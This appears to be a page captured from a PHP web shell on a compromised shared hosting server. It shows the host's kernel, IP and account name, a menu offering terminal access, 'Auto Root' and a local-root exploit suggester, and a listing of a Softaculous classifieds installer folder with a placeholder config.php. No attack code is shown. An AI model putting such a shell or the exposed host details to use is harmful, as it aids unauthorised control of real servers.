Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 3.134.118.113
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
osclassified /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2024-11-15 13:58
php53
[ DIR ]
drwxr-xr-x
2024-11-15 13:58
php56
[ DIR ]
drwxr-xr-x
2024-11-15 13:58
php71
[ DIR ]
drwxr-xr-x
2024-11-15 13:58
php81
[ DIR ]
drwxr-xr-x
2024-11-15 13:58
php82
[ DIR ]
drwxr-xr-x
2024-11-15 13:58
changelog.txt
4.63
KB
-rw-r--r--
2023-12-04 10:18
clone.php
5.86
KB
-rw-r--r--
2024-05-02 12:16
config.php
3.81
KB
-rw-r--r--
2023-12-04 10:18
edit.php
4.82
KB
-rw-r--r--
2024-05-02 12:16
edit.xml
433
B
-rw-r--r--
2023-08-21 10:43
extend.php
9.11
KB
-rw-r--r--
2024-05-02 12:16
fileindex.php
135
B
-rw-r--r--
2023-08-21 10:43
import.php
3.42
KB
-rw-r--r--
2024-05-02 12:16
info.xml
3.97
KB
-rw-r--r--
2024-05-02 10:25
install.js
921
B
-rw-r--r--
2023-08-21 10:43
install.php
6.22
KB
-rw-r--r--
2024-05-02 12:16
install.xml
922
B
-rw-r--r--
2023-08-21 10:43
md5
7.31
KB
-rw-r--r--
2024-05-02 12:16
notes.txt
181
B
-rw-r--r--
2023-12-04 10:18
osclassified.sql
3.88
MB
-rw-r--r--
2023-12-04 10:18
osclassified.zip
6.49
MB
-rw-r--r--
2023-12-04 10:18
robots.txt
273
B
-rw-r--r--
2023-08-21 10:43
update_pass.php
562
B
-rw-r--r--
2023-08-21 10:43
Save
Rename
<?php // MySql database host define('DB_HOST', '[[softdbhost]]'); // MySql database username define('DB_USER', '[[softdbuser]]'); // MySql database password define('DB_PASSWORD', '[[softdbpass]]'); // MySql database name define('DB_NAME', '[[softdb]]'); // MySql database table prefix define('DB_TABLE_PREFIX', '[[dbprefix]]'); // Relative web url define('REL_WEB_URL', '[[relativeurl]]/'); // Web address - modify here for SSL version of site define('WEB_PATH', '[[softurl]]/'); // *************************************** // // ** OPTIONAL CONFIGURATION PARAMETERS ** // // *************************************** // // Enable debugging // define('OSC_DEBUG', true); // show PHP error logs and notices // define('OSC_DEBUG_DB', true); // show DB queries // define('OSC_DEBUG_LOG', true); // save PHP errors & logs to oc-content/debug.log // define('OSC_DEBUG_DB_LOG', true); // save DB logs into oc-content/queries.log // define('OSC_DEBUG_DB_EXPLAIN', true); // save DB explain logs into oc-content/explain_queries.log // define('OSC_DEBUG_CACHE', true); // show cache debug information, when cache is enabled // define('OSC_DEBUG_DB_AJAX_PRINT', true); // print errors on ajax calls // Change backoffice folder (after re-naming /oc-admin/ folder) // define('OC_ADMIN_FOLDER', 'oc-admin'); // Demo mode //define('DEMO', true); //define('DEMO_THEMES', true); //define('DEMO_PLUGINS', true); // PHP memory limit (ideally should be more than 128MB) // define('OSC_MEMORY_LIMIT', '256M'); // Debug PHP mailer. OSC_DEBUG must be true. Error logs from PHPMailer goes to oc-content/debug.log automatically. // Accepted debug level values: 1 - client only, 2 - client and server (default), 3 - client, server and connection, 4 - low-level information // define('PHPMAILER_DEBUG_LEVEL', 1); // Set cookies domain to transfer cookies & session across domain & subdomains. Enter 'yourdomain.com' to transfer cookies to subdomains. // After setting COOKIE_DOMAIN, clean cache, cookies and restart browser! // define('COOKIE_DOMAIN', 'yoursite.com'); // Cache options for OSC_CACHE: memcache, memcached, apc, apcu, default // Default cache means dummy one - just imitates cache // define('OSC_CACHE_TTL', 60); // Cache refresh time in seconds // MemCache caching option (database queries cache). Select only one $_cache_config option, TCP or Unix socket // define('OSC_CACHE', 'memcache'); // $_cache_config[] = array('default_host' => '127.0.0.1', 'default_port' => 11211, 'default_weight' => 1); // TCP option // $_cache_config[] = array('default_host' => '/usr/local/var/run/memcache.sock', 'default_port' => 0, 'default_weight' => 1); // Unix socket option // MemCached caching option (database queries cache). Select only one $_cache_config option, TCP or Unix socket // define('OSC_CACHE', 'memcached'); // $_cache_config[] = array('default_host' => '127.0.0.1', 'default_port' => 11211, 'default_weight' => 1); // TCP option // $_cache_config[] = array('default_host' => '/usr/local/var/run/memcached.sock', 'default_port' => 0, 'default_weight' => 1); // Unix socket option // Redis caching option (database queries cache). Only one $_cache_config option supported, TCP or Unix socket // define('OSC_CACHE', 'redis'); // $_cache_config[] = array('default_host' => '127.0.0.1', 'default_port' => 6379, 'default_password' => ''); // TCP option // $_cache_config[] = array('default_host' => '/usr/local/var/run/redis.sock', 'default_port' => -1, 'default_password' => ''); // Unix socket option // Force disable URL encoding for non-latin characters // define('OSC_FORCE_DISABLE_URL_ENCODING', true); // Alpha & beta testing - experimental // define('ALPHA_TEST', true); // define('BETA_TEST', true); // Increase default login time for user // session_set_cookie_params(2592000); // ini_set('session.gc_maxlifetime', 2592000); ?>